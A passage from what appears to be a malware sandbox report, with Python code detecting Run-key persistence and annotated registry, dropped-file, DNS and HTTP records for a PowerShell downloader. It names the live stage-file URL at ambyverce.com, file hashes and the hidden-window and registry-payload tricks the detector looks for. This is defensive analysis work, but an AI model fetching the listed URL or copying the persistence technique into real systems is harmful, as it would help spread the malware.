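def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _first_group(match):
    return next((g for g in match.groups() if g is not None), "") if match else ""


def parse_reg_add(cmd):
    """Extract key, value name, type and data from a `reg add` command line, or None."""
    key = re.search(r'\breg(?:\.exe)?\s+add\s+"?([^"\s]+)', cmd, re.IGNORECASE)
    if not key:
        return None
    name = re.search(r'/v\s+(?:"([^"]*)"|(\S+))', cmd, re.IGNORECASE)
    typ = re.search(r"/t\s+(\S+)", cmd, re.IGNORECASE)
    data = re.search(r'/d\s+(?:"(.*)"\s*$|(\S+))', cmd, re.IGNORECASE | re.DOTALL)
    return {"key": key.group(1), "name": _first_group(name),
            "type": typ.group(1).upper() if typ else "REG_SZ", "data": _first_group(data)}


def run_value_reasons(value):
    """Why a Run value looks like the one written in this report."""
    reasons = []
    if value["type"] == "REG_EXPAND_SZ" and re.match(r"\s*%[^%]+%", value["data"]):
        reasons.append("launcher hidden in an environment variable expanded at logon")
    if re.search(r"Get-ItemProperty|HK(?:CU|LM):\\", value["data"], re.IGNORECASE):
        reasons.append("payload read from another registry key at run time")
    if re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", value["data"], re.IGNORECASE):
        reasons.append("hidden window (-WindowStyle 1 is Hidden)")
    return reasons


def lineage(events, pid):
    """Ancestor chain root..pid as 'image(pid)' strings; stops at an unknown PPID."""
    by_pid = {e[0]: e for e in events}
    chain = []
    while pid in by_pid:
        _, ppid, image, _ = by_pid[pid]
        chain.append(f"{basename(image)}({pid})")
        pid = ppid
    return chain[::-1]


def detect_run_key_persistence(events):
    """One finding per reg.exe Run-key write whose ancestry holds a script host
    or whose value data is suspicious on its own."""
    findings = []
    for pid, _, image, cmd in events:
        if basename(image) != "reg.exe" or not RUN_KEY.search(cmd):
            continue
        value = parse_reg_add(cmd)
        if value is None:
            continue
        chain = lineage(events, pid)
        reasons = run_value_reasons(value)
        hosts = [node for node in chain if node.split("(")[0] in SCRIPT_HOSTS]
        if hosts:
            reasons.append("script host in ancestry: " + ", ".join(hosts))
        if reasons:
            findings.append({"pid": pid, "chain": " > ".join(chain), "value": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_run_key_persistence(EVENTS):
        print(f"reg.exe pid {f['pid']}: {f['chain']}")
        print(f"  {f['value']['key']}\\{f['value']['name']} ({f['value']['type']})")
        for reason in f["reasons"]:
            print("  -", reason)
```

The value-data checks matter more than the ancestry in practice: after a reboot the launcher runs from the Run key with no script host above it, so a hunt over existing Run values (REG_EXPAND_SZ data beginning with %VAR%, a Get-ItemProperty or HKCU:\ reference, a hidden-window switch) still finds this persistence when the process chain is long gone. The parser deliberately tolerates both quoted and bare /v and /d arguments because reg.exe accepts either.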
Total events: 13 925
Read events: 13 892
Write events: 33
Delete events: 0

Modification events (10 of the 33 write events are listed on this page)

PID 6764 wscript.exe  write  HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap  ProxyBypass = 1
PID 6764 wscript.exe  write  HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap  IntranetName = 1
PID 6764 wscript.exe  write  HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap  UNCAsIntranet = 1
PID 6764 wscript.exe  write  HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap  AutoDetect = 0
PID 6340 powershell.exe  write  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32  EnableFileTracing = 0
PID 6340 powershell.exe  write  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32  EnableAutoFileTracing = 0
PID 6340 powershell.exe  write  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32  EnableConsoleTracing = 0
PID 6340 powershell.exe  write  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32  FileTracingMask = (value not shown)
PID 6340 powershell.exe  write  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32  ConsoleTracingMask = (value not shown)
PID 6340 powershell.exe  write  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32  MaxFileSize = 1048576

Caveat: none of these ten writes is a malware action in itself. The ZoneMap values are set when the script host initialises Internet Explorer security zones, and the Tracing\powershell_RASAPI32 values are created automatically when a process loads the RAS API, which is what the "Disables trace logs" INFO signature is reacting to; both appear in benign runs as well. The write that matters, the Run value added by reg.exe (PID 3028) and flagged as MALICIOUS above, is among the 33 writes but not in this excerpt; see the full report.
Executable files: 0
Suspicious files: 2
Text files: 5
Unknown types: 0

Dropped files

PID 6340 powershell.exe  C:\Users\admin\AppData\Roaming\Ekskluderingerne180.Slu  (text)
  MD5: E6C9F630525B15F12D6E5303BAAD1EB4
  SHA256: A2F29B2C3C5DA87D13B112BE48CC1346DD11299E1CF0C292E9ABF6E4F93C2A4E
PID 6340 powershell.exe  C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l1hz55hx.ltc.ps1  (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 1488 powershell.exe  C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xifidozt.nnq.psm1  (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 6340 powershell.exe  C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u5iooyxr.ukw.psm1  (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 1488 powershell.exe  C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache  (binary)
  MD5: 8E7D26D71A1CAF822C338431F0651251
  SHA256: 495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
PID 6340 powershell.exe  C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  (binary)
  MD5: CF02A17AB792734D31D94427DE24BDF1
  SHA256: CE31491188B444972FE900440A7475FC22B7E3EBB36FEF916B7CD75FA1D502A4
PID 1488 powershell.exe  C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5manmrna.fzl.ps1  (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Only the first entry is a malware artifact: it is the base64 text that PID 6340 downloaded from ambyverce.com and that the script later decodes and slices with .substring(346457, 27968); its hashes are the ones worth keeping. The __PSScriptPolicyTest_* files (all four have the same content, MD5 D17FE0A3F47BE24A6453E9EF58C94641) are written by PowerShell itself when it probes whether AppLocker/WDAC script enforcement applies to it, and ModuleAnalysisCache and StartupProfileData-NonInteractive are ordinary PowerShell housekeeping; all of them appear in any PowerShell run and are not indicators.
Network (the PCAP, stream contents and HTTP bodies are only in the full report)
HTTP(S) requests: 4
TCP/UDP connections: 31
DNS requests: 22
Threats: 1

HTTP requests

PID 5052 svchost.exe  GET 200  192.229.221.95:80  http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D  CN: unknown  reputation: whitelisted
PID 7144 backgroundTaskHost.exe  GET 200  192.229.221.95:80  http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D  CN: unknown  reputation: whitelisted
PID 6952 SIHClient.exe  GET 200  23.52.120.96:80  http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl  CN: unknown  reputation: whitelisted
PID 6340 powershell.exe  GET 200  193.25.216.108:80  http://ambyverce.com/Testamentdjr.snp  CN: unknown  reputation: suspicious

Only the last request belongs to the sample; the first three are OS background OCSP/CRL checks. The 200 response to PID 6340 is the stage file that appears under Dropped files as Ekskluderingerne180.Slu, fetched over plain HTTP with the script's forged Firefox User-Agent.

Connections (10 of the 31 are listed on this page; all ten are OS background traffic, and the connection from PID 6340 to 193.25.216.108 appears only under HTTP requests and Threats)

PID 2208 svchost.exe  20.73.194.208:443  settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted
PID 4 System  192.168.100.255:138  (local broadcast, no domain)  whitelisted
PID 1132 RUXIMICS.exe  20.73.194.208:443  settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted
PID 2120 MoUsoCoreWorker.exe  20.73.194.208:443  settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted
PID 3260 svchost.exe  40.113.103.199:443  client.wns.windows.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted
PID 5052 svchost.exe  20.190.159.4:443  login.live.com  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
PID 5052 svchost.exe  192.229.221.95:80  ocsp.digicert.com  EDGECAST  US  whitelisted
PID 7144 backgroundTaskHost.exe  20.103.156.88:443  arc.msn.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  unknown
PID 7144 backgroundTaskHost.exe  192.229.221.95:80  ocsp.digicert.com  EDGECAST  US  whitelisted
PID 2120 MoUsoCoreWorker.exe  51.104.136.2:443  settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted

DNS requests

settings-win.data.microsoft.com  →  20.73.194.208, 51.104.136.2, 51.124.78.146  (whitelisted)
google.com  →  142.250.185.110  (whitelisted)
client.wns.windows.com  →  40.113.103.199  (whitelisted)
login.live.com  →  20.190.159.4, 20.190.159.2, 20.190.159.75, 40.126.31.73, 20.190.159.71, 40.126.31.71, 20.190.159.64, 40.126.31.67  (whitelisted)
ocsp.digicert.com  →  192.229.221.95  (whitelisted)
aterecierais.ru.com  →  no answer  (unknown)
arc.msn.com  →  20.103.156.88  (whitelisted)
ambyverce.com  →  193.25.216.108  (unknown)
slscr.update.microsoft.com  →  13.85.23.86  (whitelisted)
www.microsoft.com  →  23.52.120.96  (whitelisted)

The two names without Microsoft or Google reputation are the sample's. aterecierais.ru.com is the first URL in the script's download list and returned no address, so the download loop rotated to ambyverce.com, the only host that served the stage file; both names, plus 193.25.216.108, are the network indicators to take from this report.

Threats

PID 6340 powershell.exe  Misc Attack  ET DROP Spamhaus DROP Listed Traffic Inbound group 37

The only external peer attributed to PID 6340 in this report is 193.25.216.108 (ambyverce.com), so the stage-file host sits in address space on the Spamhaus DROP list and the rule fired on the inbound side of that download. It is a reputation hit, not a signature for the payload itself.